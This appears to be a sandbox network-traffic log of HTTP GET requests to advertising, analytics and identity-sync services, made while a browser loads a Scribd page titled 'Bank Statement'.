Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-GB%2Cen%2Cen-US%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=ae570e5b-7408-44c7-a275-b9d7e6499f48&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=57523e79-2d85-47d3-af35-a39e11e7d0a2&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sp.pl?a=10000&d=Tue%2C%2018%20Feb%202025%2007%3A16%3A52%20GMT&n=5&b=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&.yp=10143699&f=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&enc=UTF-8&yv=1.16.6&tagmgr=gtm HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-GB%2Cen%2Cen-US%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=ae570e5b-7408-44c7-a275-b9d7e6499f48&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=57523e79-2d85-47d3-af35-a39e11e7d0a2&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy=&redir=https%3A%2F%2Fi.liadm.com%2Fs%2F88342%3Fbidder_id%3D246498%26bidder_uuid%3D%24UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=1275989254868253457531
Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fi.liadm.com%2Fs%2F81081%3Fbidder_id%3D91218%26bidder_uuid%3D%24UID%26gdpr%3D0 HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /s/53233?bidder_id=183658&bidder_uuid=9028781667127667262 HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=liveintent&ttd_tpi=1&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync/liveintent/?cb=%2F%2Fi.liadm.com%2Fs%2F35004%3Fbidder_id%3D98254%26bidder_uuid%3D__ZUID__&s=2 HTTP/1.1Host: b1sync.outbrain.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cm?pub=39342&in=1&userid=9fa5f896-689e-4e02-892e-586e4b3d39e8%3A1739863015.260034&forward=https%3A//i.liadm.com/s/56409%3Fbidder_id%3D200442%26bidder_uuid%3D9fa5f896-689e-4e02-892e-586e4b3d39e8%253A1739863015.260034%26pid%3D500040%26it%3D1%26iv%3D9fa5f896-689e-4e02-892e-586e4b3d39e8%253A1739863015.260034%26_%3D1739863015.2620804&cb=1739863015.2621722 HTTP/1.1Host: p.rfihub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/991817613/?random=1739863013890&cv=11&fst=1739863013890&bg=ffffff&guid=ON&async=1&gtm=45be52d0v9178425511z878386455za201zb9101043253&gcd=13l3l3l3l1l1&dma=0&tag_exp=102067808~102482432~102539968~102556566~102558064~102587591~102605417~102640599&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&hn=www.googleadservices.com&frm=0&tiba=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&npa=0&pscdl=noapi&auid=940495529.1739863009&uaa=x86&uab=64&uafvl=Microsoft%2520Edge%3B117.0.2045.47%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fdr=QA&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js?network_code=22797863291 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tr/?id=287045611447707&ev=PageView&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&rl=&if=false&ts=1739863014755&sw=1280&sh=1024&v=2.9.183&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=12318&fbp=fb.1.1739863014750.626798575259924062&cs_est=true&ler=empty&it=1739863012215&coo=false&tm=1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /1d0fec24-9622-4770-a71d-6dd2fd3e4842/launchpad-liveramp.js HTTP/1.1Host: launchpad-wrapper.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /qaKtxuL1KR_2Tfmz0NmPaAudsBc/gpt_and_prebid/config.js HTTP/1.1Host: cdn.confiant-integrations.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /latest/launchpad.bundle.js HTTP/1.1Host: launchpad.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /hadron.js?url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ref=&_it=freestar&partner_id=474&ha=_hadron HTTP/1.1Host: cdn.hadronid.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /aax2/apstag.js HTTP/1.1Host: c.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /gallery.js HTTP/1.1Host: freestar-io.videoplayerhub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v1/envelope?pid=0013300001cFpYHAA0&gdpr=0&src=pbjs&ver=9.23.0&coppa=0 HTTP/1.1Host: lexicon.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/identity/envelope?pid=106 HTTP/1.1Host: api.rlcdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&domain=www.scribd.com HTTP/1.1Host: id.hadron.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /live/liveView.php?s=115858&cbuster=1739863019&pubUrl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&x=400&y=272&playerApiId=freestarPrimisPlayer&schain=1.0,1!freestar.com,1651,1 HTTP/1.1Host: live.primis.techConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /f?apiKey=2111098132&r=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement HTTP/1.1Host: fid.agkn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /quant.js HTTP/1.1Host: secure.quantserve.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/rid?ttd_pid=6bjin1p&fmt=json HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /idex/did-0047/any?duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&did=did-0047&cd=.scribd.com&pu=https%3A%2F%2Fwww.scribd.com&resolve=nonId&resolve=uid2&resolve=index&resolve=bidswitch&resolve=pubmatic&resolve=magnite&resolve=openx&resolve=thetradedesk&resolve=medianet&resolve=triplelift HTTP/1.1Host: idx.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&domain=www.scribd.com HTTP/1.1Host: id.hadron.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tag?h=freestar-io&upapi=true HTTP/1.1Host: btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /f?apiKey=2111098132&r=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement HTTP/1.1Host: fid.agkn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cdn/prod/config?src=600&u=https%3A%2F%2Fwww.scribd.com&pubid=0ab198dd-b265-462a-ae36-74e163ad6159 HTTP/1.1Host: c.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/u/matches/474?_it=freestar HTTP/1.1Host: a.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
